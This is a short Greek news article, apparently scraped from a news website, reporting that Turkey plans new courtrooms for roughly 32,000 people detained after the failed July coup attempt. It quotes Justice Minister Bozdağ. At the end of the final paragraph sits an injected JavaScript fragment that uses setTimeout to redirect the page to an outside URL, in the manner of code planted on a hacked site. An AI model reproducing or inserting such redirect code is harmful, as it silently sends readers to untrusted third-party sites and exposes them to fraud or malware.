Τουρκία: Δεν «φθάνουν» τα δικαστήρια για τους 32.000 συλληφθέντες «πραξικοπηματίες»

0
4

 

Η Τουρκία σχεδιάζει να κατασκευάσει νέες αίθουσες δικαστηρίων για να διαχειριστεί τους χιλιάδες συλληφθέντες κατηγορούμενους για την αποτυχημένη απόπειρα πραξικοπήματος του Ιουλίου, όπως δήλωσε ο υπουργός Δικαιοσύνης Μπεκίρ Μποζντάγ.

Ο αριθμός των συλληφθέντων έχει φθάσει τις 32.000!

Οι αρχές έχουν προφυλακίσει ή απολύσει ανθρώπους από υπηρεσίες στην τοπική αυτοδιοίκηση, τον στρατό, τα μέσα ενημέρωσης και το δικαστικό σώμα και έχουν ζητήσει από τις ΗΠΑ να εκδώσουν τον πρώην ιεροκήρυκα Φετουλάχ Γκιουλέν, τον οποίο κατηγορούν ότι οργάνωσε την αποτυχημένη απόπειρα πραξικοπήματος.

«Θα ανεγείρουμε νέες αίθουσες δικαστηρίων σύμφωνα με τις ανάγκες», δήλωσε ο Μποζντάγ στο ιδιωτικό τηλεοπτικό δίκτυο NTV.

Ο ίδιος πρόσθεσε πως δεν αναμένει να διεξαχθούν μαζικές δίκες με «χιλιάδες κατηγορουμένους» και διευκρίνισε πως μερικά από τα 32.000 πρόσωπα που κρατούνται για σχέσεις με τον Γκιουλέν μπορεί να απελευθερωθούν καθώς θα προχωρεί η νομική διαδικασία.
Διευκρίνισε δε πως οι δίκες θα διεξαχθούν σε πολλές πόλεις της Τουρκίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here